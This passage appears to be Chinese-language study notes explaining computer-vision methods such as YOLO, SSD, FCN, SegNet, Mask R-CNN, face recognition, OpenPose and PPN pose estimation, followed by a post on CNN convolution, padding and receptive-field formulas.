  3. 非极大值抑制(NMS):确保每个物体只被检测一次,去除去除置信度低的边界框。

有关更多细节,建议阅读 Frank Tian/写给小白的 YOLO 介绍

YOLO v2~v8

由于 YOLO 算法采用了固定的 7x7 网格来对图像进行处理,并且每个网格单元只能对应一个物体,因此对于尺寸较小的物体,很容易被忽略或误判。

YOLO_v2

为了解决 YOLO 对小物体检测能力差的问题,YOLO v2 引入了 预定义的先验框 (Anchor Boxes),这些先验框代表了不同大小和宽高比的物体区域。每个网格单元不再只预测一个边界框,而是 预测多个边界框,这些边界框基于不同的先验框,覆盖不同大小和宽高比的物体。

YOLOv2 通过引入这些先验框,能够更好地处理不同大小和宽高比的物体,提高了检测的准确率。

其他的讲不了了,速度已经起飞了 🛫!哭了!

SSD

SSD(Single Shot MultiBox Detector)是谷歌提出的另一种用于图像中目标检测的深度学习算法。它的核心优势在于速度快和准确度高,适合实时处理场景。

步骤

  1. 多尺度卷积操作:在输入的图像上应用卷积网络,生成 不同尺度的特征图,以捕捉不同大小的物体信息。
  2. 先验框物体检测:在各个特征图上定义多个先验框(也称为锚框),它们是预设的不同形状和尺寸的矩形框,作为物体可能出现的位置。
  3. 类别和边界框预测:对每个先验框,网络将同时预测物体的类别和边界框的偏移量。这里的类别预测是指判断框内是什么物体,边界框偏移量是对先验框位置的微调。
  4. 后处理:使用 NMS(非极大值抑制)等技术处理预测结果,去除重叠度高的冗余框,并根据置信度筛选出最终的检测结果。

图像分割(Image Segmentation)

包括:

  • 语义分割(Semantic Segmentation) :将图像分成多个区域,并为每个区域分配一个类别标签。
  • 实例分割(Instance Segmentation) :在语义分割的基础上,进一步区分同一类别中的不同实例。

image-segmentation

图像分割是指将一张图像分成多个区域或像素组,每个区域或像素组具有相似的特征或属性,其实质上是一个像素级别的分类问题。

这意味着,图像中的每一个像素点都需要被赋予一个类别标签。在技术实现上,这通常通过输出多个通道(Channels)的特征图(Feature Maps)来实现,每个通道对应一种类别。这个过程被称为 “point-wise 逐点分类”,即对图像中的每一个点逐一进行分类。

point-wise

图像分割输出的结果是一个与输入图像大小相同的分割图像,用于表示输入图像中每个像素所属的类别或区域。

为了实现这个目的,图像分割通常会输出多个 channels 的特征图,其中每个 channel 表示一个类别(上图中的不同 “切片”)。

在进行分割时,对于输入图像中的每个像素,会分别计算它在不同 channel 上的概率或分数,最终选择具有最高概率或分数的 channel 作为该像素的类别。也即,沿着通道维度,对每个像素做分类(Softmax),这就是 Pixel-wise Softmax 激活函数。激活完之后,每个像素对应的所有 Channel 的和为 1。

FCN(Fully Convolutional Network)全卷积神经网络

fcn

FCN 的计算步骤可以分为以下几个部分:

  1. Encoder:在这一部分,输入的图像通过多次卷积和池化操作来减少特征图的大小。这一过程也称为 “下采样”,因为特征图的尺寸被不断缩小。
  2. 1x1 卷积层:在 Encoder 的最后一层添加 1x1 的卷积层,它的作用是 将原始图像的每个像素与分类标签进行关联。这一层的输出是一个 具有类别数量的通道数 的特征图。注意这里说的不是最后的输出尺寸是 1x1,而是用了一个 1x1 的 point-wise 的卷积核,使得通道维度上完成了一个输入到输出类别数的转换。(PPT 上是这么写的,但是我感觉不太对,难道后续我们上采样的过程中,不会再在通道上进行数量的改变了?)
  3. Decoder:在这一部分,使用转置卷积将特征图的大小逐渐恢复到原始图像的大小。这一过程也称为 “上采样”,因为特征图的尺寸被逐渐增加。
  4. Skip Connection(跳跃连接):由于上采样过程会损失位置信息,因此需要将 Encoder 的一些特征图与 Decoder 进行连接,以帮助保留更多位置信息。这些连接称为跳跃连接。
  5. Pixel-wise Softmax:在输出层,将每个像素的类别得分转换为概率,这可以通过 Softmax 操作来实现。输出的每个像素将被分配到概率最高的类别中。

跳跃连接(Skip Connection)

skip-connection

在编码过程中,随着层数的增加,我们可以得到更高级别的特征(都卷到特征图里了),但会失去低级别的特征(比如边缘信息)。

观察这个配图,你会发现,他最后都卷成一个 1024x1x1 的输出了,从这种级别的高级特征中,你怎么还原原始图像?根本就是 1024 个实数,据此来恢复原始图像,不是不可能,但是效果肯定不会很好 / 很稳定。

因而,我们设计了跳跃连接,在神经网络中,将某些层的输出连接到距其较远的层的输入处,以便更好地保留底层细节信息。可以理解为,我们把之前的特征图那拿出来,拼接 到上采样得出的特征图中,辅助我们的解码器更好地恢复原始图像。

FCN 中的跳跃连接实现方式就是,在解码器的每一层都会将该层的特征图与其(尺寸上)对应的编码器层的特征图 进行通道上的拼接(也即合并),以保留低层特征图中的细节信息。

简而言之:跳跃连接就类似于你在一个地方看到了一个东西,然后你走了很远,但是你还记得那个东西。所以跳跃连接能够增强对细节信息的识别。

SegNet 语义分割网络

segnet

SegNet 是一种用于图像的语义分割任务的深度学习网络。与 FCN(全卷积网络)类似,SegNet 通过创新性技术提升了分割的准确性和效率。

主要改进

  1. 反卷积网络(Deconvolutional Network):
    • SegNet 使用反卷积网络进行上采样,恢复从下采样(池化操作)中失去的高分辨率特征图。
    • 反卷积有助于 减少上采样过程中产生的伪影,即图像中不真实的模式或结构。
  2. 跳跃连接(Skip Connection):
    • 类似于 FCN,SegNet 也采用了 跳跃连接 技术,用以保留低层次的细节特征。
    • 在 SegNet 中,这些连接 将编码器的每个池化层的最大池化索引传递给对应的解码器层
    • 这使得解码器能够利用具体的最大池化位置信息进行更精确的上采样,有助于提高分割的准确性。

注意这里,FCN 和 SegNet 都使用了跳跃连接,但是:

  • FCN 中的跳跃连接是将编码器阶段的特征图直接与解码器阶段的特征图 相加或拼接,以保留低级特征信息
  • SegNet 的跳跃连接则是传递编码器池化层的最大池化索引到解码器,用于在上采样过程中 恢复特征图的位置信息,而非不是直接传递特征图本身。

PSPNet (Pyramid Scene Parsing Network) 金字塔空间池化网络

PSPNet 的计算步骤可以概括为以下几个部分:

  1. 特征提取:输入的图像首先通过 CNN 网络提取特征。
  2. 金字塔池化层(Pyramid Pooling):对提取的特征图进行不同区域的池化操作,提取不同尺度的特征。
  3. 特征融合:将不同尺度的特征图进行合并,得到一个综合了全局信息和多尺度信息的特征图。
  4. 上采样:通过反卷积操作将特征图的尺寸恢复到与输入图像相同的分辨率。
  5. 预测:上采样后的特征图通过卷积层,输出最终的像素级预测结果。

优势

  • 利用全局上下文信息:金字塔池化层能够捕获从局部到全局的不同尺度特征,增强对图像整体语义的理解。
  • 多尺度特征融合:PSP-Net 使用了金字塔池化来 捕捉不同尺度的信息,并将这些信息融合在一起。
  • 参数量减少:通过金字塔池化,PSP-Net 可以将图像在不同尺度下的特征融合在一起,从而减少了需要训练的参数量。

图像分割的指标

像素级交叉熵(Pixel-wise cross entropy)和 Dice 系数(Dice coefficient)。

像素级交叉熵

逐像素比较预测值和实际值来计算损失,也即将每个像素看作一个单独的标签进行分类。

缺点:面积较大的物体对损失的权重较大,导致对于分割小物体的性能较差

Dice 系数

解决了像素交叉熵中不平衡的问题,可以看着是可求导的 IoU

$$ \text{Dice} = \frac{2|A \cap B|}{|A| + |B|} $$

其中,$A$ 代表模型预测出来的结果集合,而 $B$ 代表真实情况的结果集合。在图像分割的场景中,这通常指的是某个特定类别(如病变区域)的像素集合。简而言之,$A$ 是模型认为的目标区域,$B$ 是实际的目标区域。

通过比较这两个集合的交集与各自的大小,Dice 系数给出了模型预测精度的评估。$|A \cap B|$ 表示两个集合的交集大小,$|A|$ 和 $|B|$​ 分别表示两个集合的大小。Dice 系数的取值范围是 0 到 1,值为 1 时表示完全相同,为 0 时表示完全不同。

分子乘以 2 的原因是为了在比较两个完全相同的集合时,DICE 系数的值能够是 1。如果不乘以 2,当 A 和 B 完全相同时,$|A \cap B|$ 将等于 $|A|$ 和 $|B|$,那么公式将变为 $\frac{|A|}{2|A|}$,其值为 0.5,这显然与我们对 "完全相同" 的直觉不符。通过乘以 2,我们确保了当 A 和 B 完全相同时,公式的值为 $\frac{2|A|}{2|A|}=1$,这样的度量更加直观地反映了集合之间的相似度。

在图像分割中,$A$ 和 $B$​​ 可以理解为分别是预测结果和实际标签的集合,这个系数也可以用真阳性(TP),假阳性(FP)和假阴性(FN)来表达:

尽管就在上文,但还是在此再次注解一下:

  • 真阳性 (True Positive, TP) :预测为正类且实际上是正类的样本。
  • 假阳性 (False Positive, FP) :预测为正类但实际上是负类的样本。
  • 真阴性 (True Negative, TN) :预测为负类且实际上是负类的样本。
  • 假阴性 (False Negative, FN) :预测为负类但实际上是正类的样本。

记忆:真 / 假代表你的判断是否准确,阳性 / 阴性代表你的判断结果是正类还是负类。

$$ \text{Dice} = \frac{2TP}{2TP + FP + FN} $$

特别地,当所有值都为 0 和 1 时,公式可以简化为:

$$ \text{Dice} = \frac{2|A \cdot B|}{|A| + |B|} $$

这里的 $\cdot$ 表示向量或矩阵的点乘操作。

实例分割(Instance Segmentation)

实例分割(Instance Segmentation)是一种精细的图像分割任务,旨在 对图像中的每个对象实例进行分类和像素级定位。这一任务结合了对象分类(Object Classification)、对象检测(Object Detection)和语义分割(Semantic Segmentation),因为它需要同时识别图像中的每个物体、确定它们的边界并将它们从像素层面区分开来。

Mask R-CNN

Mask R-CNN 是一个基于 Faster R-CNN 的实例分割算法,由 Kaiming He、Georgia Gkioxari、Piotr Dollar 和 Ross Girshick 在 2017 年提出。

与 Faster R-CNN 相同,Mask R-CNN 包含两个阶段:region proposal 和 ROI (Region of Interest) pooling。Mask R-CNN 的不同之处在于新增了一个分支,用于预测每个 ROI 中每个像素的类别信息,实现 实例分割

Mask R-CNN 的计算步骤如下:

  1. 使用 ResNet 等网络结构提取输入图像的特征图。
  2. 利用特征图进行 Region Proposal,得到可能包含目标的 ROI。
  3. 对每个 ROI 进行 ROI Pooling 操作,将不同尺寸的 ROI 对齐到相同的大小。
  4. 分别对每个 ROI 进行分类和位置回归。
  5. 利用第 4 步得到的每个 ROI 的类别信息和位置信息,对 ROI 内的每个像素进行语义分割,从而得到实例分割结果。

图像分割的处理技巧

镜像填充(Mirror Padding)

mirror_padding

避免在边界上丢失信息,通过镜像填充可以在图像的边界上填充一圈镜像像素,从而扩大图像的尺寸,使得卷积核在边界处也能够正常工作(而不是卷了空填充的 0)。

损失加权(Loss Weighting)

loss_weighting

在训练过程中,可以为不同的像素分配不同的损失权重,以便更好地处理类别不平衡问题。例如,对于一些重要的像素,可以分配更高的权重,以便模型更加关注这些像素。

举个例子,如果你在做一个分类任务,其中一类数据的出现频率很低,但是这类数据非常重要,你可以给这类数据更大的损失权重,确保模型在训练时能更多地关注它们。

  • 边缘加权:增加边缘的权重,使得损失对边缘更敏感。
  • 平衡加权:根据小物体的大小增加其权重,以平衡大物体和小物体的权重。

人脸识别(Face Recognition)

人脸识别是一种通过分析人脸特征来识别个人身份的技术。它主要包括以下步骤:

  1. 人脸检测:在图像中找到人脸的位置。
  2. 人脸对齐:调整人脸的位置和角度,使得所有人脸数据保持一致的格式。不改变形状
  3. 人脸识别:利用深度学习模型提取人脸特征并进行身份识别。

人脸识别任务可以分为两类:

  1. 人脸识别:确定一张图片中的人脸是数据库中的哪一个人。这通常是多分类问题,也即给定一张图像,将其与已知的人脸库进行比较,从而确定图像中人脸对应的身份标识(ID)。
  2. 人脸验证:确认两张图片是否是同一个人。通常是二分类问题,即判断两张图片是否属于同一个人。而不需要知道其身份标识。

根据数据集的不同,人脸识别可以分为:

  • Close-set Face ID:被识别的人脸在训练集中,类似于一般的分类问题。
  • Open-set Face ID:被识别的人脸不在训练集中。

最常用的方法是开放式人脸识别,也就是 Open-set Face ID:

  • 模型是固定的,我们无法重新训练模型。
  • 在添加新人(如果相似度检查没超过阈值)时,使用 单张图像 作为参考。

Open-set Face ID 开放集人脸识别

对于 Open-set Face ID,我们通常事先训练一个图像编码器,用来从图像中提取特征向量(Discriminative Features Vector)。

feature_vector

不同人的特征向量差异较大,然而,即使在不同光照下,同一个人的特征向量也很相似。

通过比较待查询特征向量与数据库中已知特征向量的距离,我们可以找到人脸的身份 ID。

Close-set v.s. Open-set

Close-set Face IdentificationClose-set Face Verification 是简单的 分类问题,前者输出图像的类别标签,后者输出两个图像的类别标签并比较是否相同。

Open-set Face IdentificationOpen-set Face Verification 则是 特征提取问题,前者在输入图像时寻找最佳匹配的特征向量 ID,后者计算两个图像的特征向量相似度。如果相似度分数高于阈值,则这两个图像是同一个人。

close-set-and-open-set

人脸识别的优化思路

设计新的网络架构或损失函数,并通过监督学习学习区分性强的特征空间。

特征空间:指的是能够代表数据特征的多维空间。例如,在人脸识别中,特征空间可能由人脸的关键点位置、颜色、纹理等组成。

注意,大图像尺寸虽然能提高准确性,但计算成本也更高。

研究者们还在努力寻找新的损失函数,如 L-Softmax、SphereFace、ArcFace 等,以更好地训练模型。

轻量级人脸识别算法:如 MobileFaceNet,结合了 MobileNetV2 和 ArcFace 损失函数,可以在计算资源有限的设备上快速提取特征向量,适合手机、门禁等场景。

姿态估计(Pose Estimation)

姿态估计是一种计算机视觉技术,用于确定人体各部位在图像或视频中的位置和方向。

姿态估计流程

姿态估计有两种主要流程 / 方法:自顶向下和自底向上。

自顶向下方法

  • 流程
    1. 对图像中进行检测,得到每个人的位置和边界框。
    2. 对每个检测到的人使用姿态估计算法,从边界框中提取姿态信息。
  • 优点:如果目标检测准确,姿态估计也会准确。
  • 缺点
    • 如果目标检测失败,无法估计姿态。
    • 推理时间随人数增加。
    • 复杂场景和多人姿态估计可能出错。

自底向上方法

  • 流程:首先检测所有关键点,然后将这些关键点分配给不同的人。
  • 优点:推理时间固定。
  • 缺点:难以将关键点正确分配给不同的人。

姿态估计算法:Convolutional Pose Machine (CPM)

步骤:

  1. 使用目标检测找到人的边界框。
  2. 将图像输入到 VGG 网络获取特征。
  3. 特征输入到第 1 阶段 CNN,获取关键点热图。
  4. 关键点热图和特征输入到下一阶段 CNN,获得更好的关键点估计。

关键点估计:确定人体的重要部位(如头、肩膀、肘部、手、膝盖等)在图像中的确切位置。

CPM 模型由多个阶段组成,每个阶段利用先前阶段的输出作为输入,逐渐精细化预测结果,每个阶段都会提取特征并生成热图来预测关键点的位置。它将人体关键点检测问题转化为一个 回归问题

cpm_arch

如图,在这个图中展示了一个 Skip-link 操作,观察 (d) 中,我们发现他把上一层卷出来的关键点热图 $x$ 与另外一个卷积过程中卷出来的特征图 $x'$(设计相近,卷积出来的尺寸应该也相同)拼在了一起,然后继续卷积。

多阶段方法的优势

  • 较大的感受野:可以处理关键点之间的长距离依赖关系(图像中远距离的点之间的相互作用或关联)。
  • 精细调整关键点估计:每个阶段都细化关键点位置,使最终估计更准确。

OpenPose = CPM + Bottom-up

open-pose

OpenPose 是一种先进的多人姿态估计算法,它通过结合两种方法 — 自下而上的检测(Bottom-up)和自上而下的验证(CPM, Convolutional Pose Machines)— 来实现对图像中多个人体姿态的准确识别。

  • 关键点热图(Keypoint Heatmaps): 每个像素表示与某个特定关键点的相关度,通过高斯分布在关键点的位置生成二维热图。(也即配图中的上面的三张图)

  • 连接热图(Connection Heatmaps): 表示两个关键点之间是否存在连接的热图。如果两个关键点是连接的,相应位置的热图值会很高。这些热图由两个方向生成,一个是从父关键点到子关键点的热图,另一个是从子关键点到父关键点的热图。(也即配图中的下面的三张图)

  • Part Affinity Fields(PAF): 一组二元向量场,每个向量表示两个关键点之间的连线方向和置信度,其方向指向第二个关键点的位置,其大小表示两个关键点之间的置信度。用于检测不同关键点之间的关联关系(联想一下你学过的梯度场)。

    paf

算法流程

  1. 自下而上检测: OpenPose 首先使用多尺度滑动窗口来 检测图像中的所有人体关键点,并为每个关键点生成信任度图。然后,它利用 Part Affinity Fields 技术来检测不同关键点之间的关联关系。

  2. 自上而下验证: 对初步检测的结果进行分组,以区分不同的人体。OpenPose 使用 PAF 来建立不同身体部位之间的关联关系,并通过卷积神经网络预测生成包含身体部位连接信息的 2D 向量场。这些向量场用于创建关联图(Association Graph),每个人体部位对应图中的一个节点,节点之间的连接表示不同身体部位之间的亲和性关系,从而准确识别每个人体的姿态。

    在关联图中,每个人体部位对应于一个节点,不同节点之间的连接表示不同身体部位之间的亲和性关系。通过将关键点节点和 PAF 边缘连接,OpenPose 可以准确地识别每个人体的姿态。

open_pose

这张图的简要解释:

  1. 输入: 图像输入到网络中,大小为 $h \times w \times 3$,其中 $h$ 和 $w$ 分别是图像的高度和宽度,3 代表 RGB 三个颜色通道。

  2. VGG-19: 这是一个预训练的卷积神经网络,用于提取图像特征。网络由多个卷积层(C)和池化层(P)组成。卷积层用于提取图像中的空间特征,池化层用于减少特征图的维度。

  3. Stage 1: 第一阶段由两个分支组成:

    • Branch 1 生成关键点热图 $S^1$,用于预测图像中每个关键点的位置。
    • Branch 2 生成 Part Affinity Fields $L^1$,用于表示关键点之间的连接关系。

    每个分支的输出都通过损失函数(Loss)进行评估,以训练网络提高预测的准确性。

  4. Stage t: 第 $t$ 阶段($t \geq 2$)是网络的后续迭代,每个阶段都会细化前一个阶段的预测结果:

    • Branch 1 继续生成更精细的关键点热图 $S^t$。
    • Branch 2 继续生成更精细的 Part Affinity Fields $L^t$。

    同样,每个阶段的输出都有相应的损失函数进行评估。

  5. 损失函数: 每个阶段的输出都通过损失函数 $f_1$ 和 $f_2$ 计算与真实值之间的差异,用于指导网络训练。

由此可见,OpenPose 的网络结构是一个多阶段的迭代过程,每个阶段都在前一个阶段的基础上进一步提高关键点和连接关系预测的准确性。

通过这种结合自下而上和自上而下的方法,OpenPose 能够高效准确地在图像中识别并估计多人的姿态。

姿态估计算法:Pose Proposal Networks, PPN

PPN(Pose Proposal Networks)是一种基于 YOLO(You Only Look Once)和 OpenPose 的快速人体姿态估计方法。

它将姿态估计问题看作目标检测问题,避免了 OpenPose 中逐像素分析热图的繁琐过程。

相较于 OpenPose 的改进

OpenPose 需要使用 CPU 对每个像素点进行处理来找出关键点和它们的连接,这个过程比较慢,也没有很好地利用硬件资源。PPN 通过将姿态估计当作目标检测来处理,提高了效率。

PPN 流程

PPN 的处理流程包括两个阶段:

  1. 提议生成阶段:使用类似 Faster R-CNN 的方法生成人体可能位置的候选姿态框,但与 Faster R-CNN 不同,PPN 在生成的框中加入了姿态分支,用于估计人的姿态。

  2. 姿态估计阶段:采用堆叠沙漏网络(Stacked Hourglass Network),通过自下而上和自上而下的处理方式,逐步提高姿态估计的准确度。

PPN

可以看到,每个身体的连接是由两个关键点组成的。

  • OpenPose 负责估计关键点(红色点)和它们之间的连接(蓝色线)。
  • PPN 则是估计人体的边界框(绿色框),并使用贪婪算法将这些框连接起来,形成完整的人体姿态。

ppn_arch

这张图展示了 PPN(Pose Proposal Networks)处理一张输入图片并估计人体姿态的流程。我们可以将这个过程分解为以下几个步骤:

  1. 输入图像: 最初,我们有一张包含一个或多个人物的图片。

  2. 调整大小和 CNN 处理: 这张图像首先被调整大小(Resize),以适应卷积神经网络(CNN)的输入要求。然后,CNN 对图像进行处理,提取特征。

  3. RP(姿态提议)生成: CNN 处理后,我们得到了人物实例和各个部位的姿态提议(RPs of person instances and parts)。这里显示的是人体的不同部位,比如手臂或腿(Limb detections)。

  4. NMS 和双边匹配: 最后,使用非极大值抑制(NMS)和双边匹配(Bipartite Matching)技术来去除重叠的提议,并将正确的部位连接起来,得到最终的姿态解析结果(Parsing results)。

在最终结果中,我们可以看到不同颜色的边界框代表不同的人物,而彩色的线条表示人体的各个部位。这样,PPN 就可以快速而准确地估计出图片中每个人的姿态。

PPN 的局限性

  • 在人群密集的场景下,PPN 的表现可能不佳。
  • 对于人物大小差异较大的场景,PPN 的性能也可能较差。

其他应用

人员重识别 Person Re-identification(ReID)

在不同摄像头中追踪同一人。

人物属性分类 Person Attribute Classification

通过对人物的外观、行为等特征进行分析和分类,从而对人物进行描述和识别的技术。通常涉及到对人物的性别、年龄、服装、发型等属性进行识别和分类,以帮助进行人物检索、面部识别、安防监控等应用。

深度估计 Depth Estimation

深度估计任务是指从单张 RGB 图像中估计出场景中每个像素点到相机的距离,也称为深度图预测。它是 典型的生成式任务,而不是之前的判别式任务

深度估计任务的挑战在于,由于缺乏深度信息,单张 RGB 图像并不能提供完整的三维场景信息,因此需要通过学习从 RGB 图像到深度图的映射来解决这一问题。

同时,深度估计任务还需要考虑到不同场景和物体的差异性,因此需要具备一定的通用性和泛化性能。

depth_estimation

风格迁移 Style Transfer

style_transfer

超分辨率 Super Resolution

super_resolution

超分辨率网络接收一个低分辨率图像作为输入,并输出一个高分辨率的图像。

其中,神经网络的训练数据通常是一些低分辨率图像和对应的高分辨率图像对。

它的父任务是图像重建,除了提升分辨率还有去噪、去模糊等。

图像到图像的翻译 Image-to-image Translation

image_translation

图像到图像的翻译是指将一个视觉域中的图像映射到另一个视觉域中的图像的任务,例如将素描风格的图像转换为真实世界的照片,将低分辨率的图像转换为高分辨率的图像,将夏季景色照片转换为冬季景色照片等。

目前,图像到图像的翻译技术主流算法包括基于 GAN 的方法、基于 CycleGAN 的方法、基于 Pix2Pix 的方法等。

这些方法通常使用卷积神经网络来实现图像转换,其中生成器网络负责将输入图像转换为目标图像,判别器网络则负责判别生成的图像是否与真实图像相似。

同时,采用了不同的损失函数来衡量生成的图像与真实图像之间的差异,以进一步提高翻译质量。

无监督 / 非对称的图像翻译

无监督 / 非对称的图像翻译(Unsupervised/Unpaired Image-to-image Translation):不需要成对的图像数据的情况下,将一个领域的图像转换成另一个领域的图像,同时保持图像的一些属性不变。

这个任务在图像处理、计算机视觉和计算机图形学领域中有很广泛的应用,例如风格转换、图像风格化、卡通化等。

传统的图像转换方法通常需要成对的图像数据,这对数据的收集和标注都有很高的要求。

而无监督 / 非对称的图像翻译则不需要成对数据,只需要两个领域的图像集合即可。其主要挑战在于如何保证转换的结果在两个领域之间是一致的,同时又能保持每个领域的独特特征。

主要用 GAN-based 方法,比如 CycleGAN、UNIT

语义图像生成 Semantic Image Synthesis

语义图像生成(Semantic Image Synthesis)是指将自然语言文本描述转换为与之对应的语义图像的任务。

该任务的目标是生成与文本描述相关的图像,使得生成的图像能够表达文本描述所描述的内容和场景。

Credit

部分讲稿截图来自 Stanford CS231n - 2023 Spring,不过他们官网也正在同步授课,去年的版本被下架了,所以无法提供直接的 Slide 引用链接。

Frank Tian / 写给小白的 YOLO 介绍

叶子 / RCNN、SPPnet、FastRCNN 原理概述

💾

卷积神经网络

2024年4月3日 23:26

动机

对于真实图像,其动辄几万几十万像素,尺寸太大,导致全连接层的维数过高,参数过多,计算量过大,内存不足。

平移不变性:图像中的物体不管在图像中的位置如何变化,我们都能够识别出来。我们不会具体的对每一个像素点进行识别,而是对图像中的一些 特征 进行识别,这些特征是与 位置无关 的。比如我们可以识别出一张人脸,不管这张人脸在图像中的位置如何变化,我们都能够识别出来。这就是平移不变性。这进而引出了卷积神经网络(Covolutional Neural Network,CNN)的一些概念:

  • 空间上的权值共享:卷积核在图像上滑动,对图像的 不同位置使用的是同一个卷积核 (或滤波器),其权值在整个输入图像上共享。这对应我们的平移不变性(也即我们平等的对待图像中的每一个 位置 ,注意这里不是像素哦,你可以理解位置是一片像素)。这显著减少了模型的参数数量。
  • 稀疏连接:卷积核的大小远小于输入图像的大小,每个输出神经元(后一层特征图的每个像素)仅与前一层特定局部区域(这一区域称为 感受野 )内的神经元存在连接,这使得使网络专注于局部特征,并减少计算量(与之相对的,全连接层的是稠密连接,每一个全连接层的神经元都与前一层所有输出相连)。
  • 等变表示 :指的是卷积神经网络对输入数据的某种变换(如平移)具有不变性。由于权值共享,如果输入图像发生平移,卷积层的输出也会相应地平移,但是提取的特征类型不变。这种性质使得 CNN 对图像位置的变化具有一定的鲁棒性(也称健壮性)。

卷积算法(Convolution)

2D 卷积

$$ s_{r,c} = (x * W){r,c} = \sum{i} \sum_{j} x_{r+i,c+j} \cdot w_{i,j} $$

其中:

  • $x$ 是输入图像
  • $W$ 是卷积核
  • $s_{r,c}=(x*W)_{r,c}$ 是输出图像的像素值,$r$ 和 $c$ 分别是输出图像的行和列
  • $i$ 和 $j$ 分别是卷积核的行和列,其范围为对应的卷积核大小
  • $w_{i,j}$ 是卷积核 $W$ 的权重

或者可以通过转变坐标,改写为

$$ s_{r,c}=(x*W){r,c}=\sum{i=-\infty}^{\infty}\sum_{j=-\infty}^{\infty}x_{i,j}w_{r-i,c-j} $$

举个例子,一个检测水平边缘的卷积核可以是:

$$ \begin{bmatrix} -1 & -1 & -1 \ 2 & 2 & 2 \ 1 & 1 & 1 \end{bmatrix} $$

为什么这个卷积核可以检测水平边缘呢?我们可以看到,这个卷积核的中间一行是 2,上下两行是 -1,回忆一下,当滤波器与输入序列的局部路径在某个位置非常接近(也即卷积核权值大的地方原图数值也高,想想 排序不等式)时,卷积操作的结果(输出序列中的一个值)将会很高。也就是说,对于这个卷积核,当输入图像存在一个水平边缘时,卷积操作的结果将会很高。

horizontal_edge

值得一提的是,对于有多个通道(RGB)的真实图像,每个通道上都需要应用一个卷积核(可以相同 / 不同,如果不同),然后将这些通道的输出相加,得到最终的输出。

填充(padding)

迄今为止,我们提到的卷积核都是步长为 1 的,其对应的卷积后大小的公式是:

$$ \text{output_size} = \left\lfloor \frac{\text{input_size} - \text{filter_size}}{1} \right\rfloor + 1 $$

这直接导致了卷积后的图像大小缩小:

no_padding

为了维持输出图像的尺寸,或者让步长(stride)能够整除图像尺寸,我们使用填充(padding)在图像周边添加数值为 0 的空像素(一般来讲,四周的填充数值相等,因而下式对横竖两个方向同时成立)。此时,若步长为 1,考虑到取整的情况,卷积后输出尺寸的公式是:

$$ \text{output_size} = \left\lfloor \frac{\text{input_size} + 2 \times \text{padding} - \text{filter_size}}{1} \right\rfloor + 1 $$

对于步长不为 1 的情况,在此给出更泛化的步长公式,同样考虑到取整的情况,是:

$$ \text{output_size} = \left\lfloor \frac{\text{input_size} + 2 \times \text{padding} - \text{filter_size}}{\text{stride}} \right\rfloor + 1 $$

其中:

  • $\text{input_size}$: 输入图像的尺寸(高度或宽度)
  • $\text{padding}$: 填充的像素数
  • $\text{filter_size}$: 卷积核的尺寸(高度或宽度)
  • $\text{stride}$: 步长
  • $\text{output_size}$: 卷积后输出图像的尺寸(高度或宽度)
  • $\left\lfloor \cdot \right\rfloor$: 向下取整符号

如何理解这个公式?你可以这么想,$\text{input_size} + 2 \times \text{padding} - \text{filter_size}$ 是你可滑动的范围,而 $\text{stride}$ 是你每次滑动的步长,那么你最多可以滑动多少次呢?显然是 $\left\lfloor \frac{\text{input_size} + 2 \times \text{padding} - \text{filter_size}}{\text{stride}} \right\rfloor$ 次,因为你的最后一次滑动可能不足一个步长。最后再加上最开始一次,就得到了原式。

zero_padding

stereoscopic_perspective

卷积核形状(Kernel/Filter shape)

卷积核的形状对于卷积操作非常重要。对于 RGB 图像,卷积核的形状为:

$$ (\text{filter_height} \times \text{filter_width} \times \text{input_channels} \times \text{n_filters}) $$

其中:

  • $\text{filter_height}$: 卷积核的高度
  • $\text{filter_width}$: 卷积核的宽度
  • $\text{input_channels}$: 输入图像的通道数(对于 RGB 图像,通常为 3)
  • $\text{n_filters}$: 卷积核的数量

不同于单个二维平面的卷积核,我们现在讲述的是,采用多个不同的卷积核(注意,这里说的卷积核是 立体 的,单个大小为 $\text{filter_height} \times \text{filter_width} \times \text{input_channels}$)来提取不同的特征,然后将每个卷积核的输出作为一个新的通道,最后将这些通道的输出在通道维度上拼接在一起(注意此时各个卷积核的输出不再是数值上相加,而是类似 RGB 通道一样,在通道这个维度上叠在一起),得到最终的输出。

在这种情况下,每个卷积核负责提取输入图像的一个特定特征,并产生一个输出特征图。输出特征图的形状为:

$$ (\text{feature_height} \times \text{feature_width} \times \text{n_filters}) $$

其中:

  • $\text{feature_height}$: 输出特征图的高度
  • $\text{feature_width}$: 输出特征图的宽度
  • $\text{n_filters}$: 卷积核的数量

这里特征图的尺寸由输入图像的大小、填充、步长和滤波器大小共同决定。

感受野(Receptive field)

感受野指的是 输出特征图 上的一个元素(或者说像素)在原始输入图像上映射的区域大小。

尤其需要注意,这里是输出特征图,而不是输入的!

receptive_field

可以预想到,在多层卷积网络中,随着层数的增加,感受野会变大(类似于生物学中的瀑布效应),这意味着网络能够捕获更大范围的上下文信息(也即,高层的特征图中的单个像素会对应于原始图像中更大的区域)。

multi_layer_receptive_field

感受野的计算

$$ RF_{i+1}=RF_i+(k-1)\times S_i $$

其中:

  • $RF_i$ 是第 $i$ 层的感受野

  • $RF_{i+1}$ 是第 $i+1$ 层的感受野,也即当前层

  • $k$ 是 当前层的卷积核 的大小

  • $S_i$ 是之前所有层的步长的乘积( 不包括本层 ),也即 $S_i=\prod_{j=1}^{i}\text{stride}_j$

    注意 当前层的步长并不影响当前层的感受野,感受野和填补(padding)也没有关系

这个公式不难理解,假设当前层为 2($i+1=2$),对于上一层 $i$ 输出的特征图(也即本层的输入特征图,图中 Layer2)来说,一个像素的感受野是 $RF_i$(图中 Layer1 的绿色部分),那么当前层 $i+1$ 由于是从上一层卷过来的,所以一个像素代表了卷积核的大小 $k \times k$ 对应的输入特征图。而由于步长的存在,这个感受野会在上一层感受野的基础上扩大步长所覆盖的范围,其要扩大 $k-1$ 次(走了几步)先前 $k-1$ 个步长的累乘(单步步长的累积)。

我们上一张图举例:

Layer1

  • 由于是初始层,定义 $RF_0=1$,$k=3$,$\text{stride}_0=1$,$S_0=1$
  • 因此 $RF_1=1+(3-1)\times 1=3$
  • 注意,感受野说的是 输出的特征图 的每个像素代表的原始图像尺寸,所以 Layer1 的感受野是图中 Layer2 中的一个像素代表的原始范围。

Layer2

  • $RF_1=1$,$k=3$,$\text{stride}_2=2$,$S_1=1$
  • 因此 $RF_2=3+(3-1)\times 1=5$

Layer3

  • $RF_2=5$,$k=3$,$\text{stride}_3=1$,$S_2=2$
  • 因此 $RF_3=5+(3-1)\times 2=9$

空洞卷积

空洞卷积 (dilated convolution):可以增加感受野而不增加参数数量。这是由于采样变得更加稀疏导致的,在实现上,这对应在卷积核中间插入 0,使得卷积核的感受野变大

